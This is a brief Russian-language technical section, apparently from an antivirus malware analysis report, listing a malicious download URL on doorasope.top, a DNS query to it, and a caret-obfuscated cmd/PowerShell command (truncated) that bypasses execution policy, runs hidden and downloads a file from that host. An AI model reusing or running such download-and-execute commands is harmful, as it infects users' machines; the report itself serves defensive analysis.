Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "po^WErsH^el^L.exE ^-^EXeCUtIo^NpOli^c^y BY^pA^Ss -n^opR^OFI^LE^ ^-^WinD^OWstYlE h^id^DEN^ (neW^-obJE^C^T s^yST^e^m.^n^et.W^e^bCLiEn^T^)^.d^owN^Loadfile('http://www.dooras...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "po^WErsH^el^L.exE ^-^EXeCUtIo^NpOli^c^y BY^pA^Ss -n^opR^OFI^LE^ ^-^WinD^OWstYlE h^id^DEN^ (neW^-obJE^C^T s^yST^e^m.^n^et.W^e^bCLiEn^T^)^.d^owN^Loadfile('http://www.dooras...' (со скрытым окном)